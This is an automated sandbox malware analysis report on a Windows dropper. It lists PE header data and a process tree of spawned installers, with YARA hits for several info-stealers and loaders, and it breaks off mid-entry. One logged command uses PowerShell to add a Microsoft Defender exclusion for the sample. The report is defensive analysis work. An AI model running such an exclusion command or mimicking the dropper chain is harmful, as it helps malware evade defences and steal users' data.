                                                                                                                                                                                                                                Thumbprint MD5:8C74F4D8F122C972E82664C720C5065F
                                                                                                                                                                                                                                Thumbprint SHA-1:7371AC4AF66383A466DB59FC20A43346F996B92B
                                                                                                                                                                                                                                Thumbprint SHA-256:B565713D3BB668C26490EEDB925608055875E63F795CD5DE1729162E08CACED2
                                                                                                                                                                                                                                Serial:291B0D8C1A1196488D44C77B32422497
                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                                pop edx
                                                                                                                                                                                                                                nop
                                                                                                                                                                                                                                add byte ptr [ebx], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax+eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x626 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x9c00 | 0x18e0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0c4 | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x919a | 0x9200 | 94bdd260b7fde5112c70dbd22d6bcb6e | False | 0.5108090753424658 | data | 5.963722722119575 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x626 | 0x800 | 7ccd95491660fbda3924dbe08f84df33 | False | 0.32421875 | data | 3.4778778318304995 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x39c | data | | | 0.38852813852813856
RT_MANIFEST | 0xc43c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                                                                                                                                                                                                Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:11:27:08
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                Imagebase:0x1f8171c0000
                                                                                                                                                                                                                                File size:46'304 bytes
                                                                                                                                                                                                                                MD5 hash:E533F92146FCACB8CACA823882B8D304
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:11:27:09
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:11:27:26
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
                                                                                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:11:27:26
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:11:27:26
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                                                                                                                                                                Imagebase:0xad0000
                                                                                                                                                                                                                                File size:42'064 bytes
                                                                                                                                                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:11:27:26
Start date: 12/03/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 11:27:27
Start date: 12/03/2024
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564
Imagebase: 0x7ff623430000
File size: 570'736 bytes
MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 11:27:28
Start date: 12/03/2024
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -u -p 7564 -s 73500
Imagebase: 0x7ff623430000
File size: 570'736 bytes
MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 12
Start time: 11:27:32
Start date: 12/03/2024
Path: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
Imagebase: 0x400000
File size: 2'172'545 bytes
MD5 hash: 9D959BCB3482D418504AF43B76F7A181
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 13
Start time: 11:27:32
Start date: 12/03/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff693ab0000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 11:27:33
Start date: 12/03/2024
Path: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp" /SL5="$104B0,1807550,56832,C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
Imagebase: 0x400000
File size: 706'560 bytes
MD5 hash: 1C1FD0B05187F81F28F910EB5B511E12
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 15
Start time: 11:27:35
Start date: 12/03/2024
Path: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe"
Imagebase: 0x400000
File size: 2'146'073 bytes
MD5 hash: 4D3AD654117203E9216F6F44480BB6E0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 16
Start time: 11:27:35
Start date: 12/03/2024
Path: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
Imagebase: 0x400000
File size: 2'075'202 bytes
MD5 hash: B0E9D3290621648878CA0D486C60F951
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000000.2004294396.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 17
Start time: 11:27:35
Start date: 12/03/2024
Path: C:\Users\user\AppData\Local\Temp\syncUpd.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\syncUpd.exe
Imagebase: 0x400000
File size: 204'288 bytes
MD5 hash: 220CB1B1688C2364B9AB272E37B896F3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.3181473452.0000000000703000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:11:27:38
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:11:27:39
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'172'545 bytes
                                                                                                                                                                                                                                MD5 hash:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:11:27:39
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:1'828'864 bytes
                                                                                                                                                                                                                                MD5 hash:EEE5DDCFFBED16222CAC0A1B4E2E466E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000002.3151972256.0000000000401000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:11:27:40
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'075'202 bytes
                                                                                                                                                                                                                                MD5 hash:B0E9D3290621648878CA0D486C60F951
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.2055445939.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000015.00000002.3188674818.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000015.00000002.3188878338.0000000002B21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:11:27:43
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp" /SL5="$504EC,1807550,56832,C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:706'560 bytes
                                                                                                                                                                                                                                MD5 hash:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:11:27:43
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:11:27:43
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --silent --allusers=0
                                                                                                                                                                                                                                Imagebase:0x7f0000
                                                                                                                                                                                                                                File size:2'960'760 bytes
                                                                                                                                                                                                                                MD5 hash:61ACBBC8CAEF6EB5C8D4CBDE2EEC2312
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:11:27:43
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
Commandline: "C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe"
Imagebase: 0x400000
File size: 2'146'073 bytes
MD5 hash: 4D3AD654117203E9216F6F44480BB6E0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 26
Start time: 11:27:45
Start date: 12/03/2024
Path: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
Imagebase: 0x7f0000
File size: 2'960'760 bytes
MD5 hash: 61ACBBC8CAEF6EB5C8D4CBDE2EEC2312
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 27
Start time: 11:27:45
Start date: 12/03/2024
Path: C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe"
Imagebase: 0x400000
File size: 2'146'073 bytes
MD5 hash: 4D3AD654117203E9216F6F44480BB6E0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 28
Start time: 11:27:46
Start date: 12/03/2024
Path: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe" --silent --allusers=0
Imagebase: 0xd70000
File size: 2'960'760 bytes
MD5 hash: B4CEF398C7001044330BE058549F9DE3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 11:27:46
Start date: 12/03/2024
Path: C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe"
Imagebase: 0x400000
File size: 2'146'073 bytes
MD5 hash: 4D3AD654117203E9216F6F44480BB6E0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 30
Start time: 11:27:47
Start date: 12/03/2024
Path: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
Imagebase: 0x400000
File size: 2'172'545 bytes
MD5 hash: 9D959BCB3482D418504AF43B76F7A181
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 11:27:47
Start date: 12/03/2024
Path: C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe"
Imagebase: 0x400000
File size: 2'146'073 bytes
MD5 hash: 4D3AD654117203E9216F6F44480BB6E0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 32
Start time: 11:27:49
Start date: 12/03/2024
Path: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
Imagebase: 0xd70000
File size: 2'960'760 bytes
MD5 hash: B4CEF398C7001044330BE058549F9DE3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 33
Start time: 11:27:49
Start date: 12/03/2024
Path: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --version
Imagebase: 0x280000
File size: 2'960'760 bytes
MD5 hash: 61ACBBC8CAEF6EB5C8D4CBDE2EEC2312
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 34
Start time: 11:27:49
Start date: 12/03/2024
Path: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe"
Imagebase: 0x400000
File size: 2'172'545 bytes
MD5 hash: 9D959BCB3482D418504AF43B76F7A181
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 11:27:49
Start date: 12/03/2024
Path: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe"
Imagebase: 0x400000
File size: 4'283'784 bytes
MD5 hash: F0A6999F1BC47C6C468CF6DB95003AD5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000023.00000002.3204206599.0000000001099000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000023.00000002.3216579731.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe" --silent --allusers=0
                                                                                                                                                                                                                                Imagebase:0x180000
                                                                                                                                                                                                                                File size:2'960'760 bytes
                                                                                                                                                                                                                                MD5 hash:95F97B76DCB43201CEBCFACE99D5C36C
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
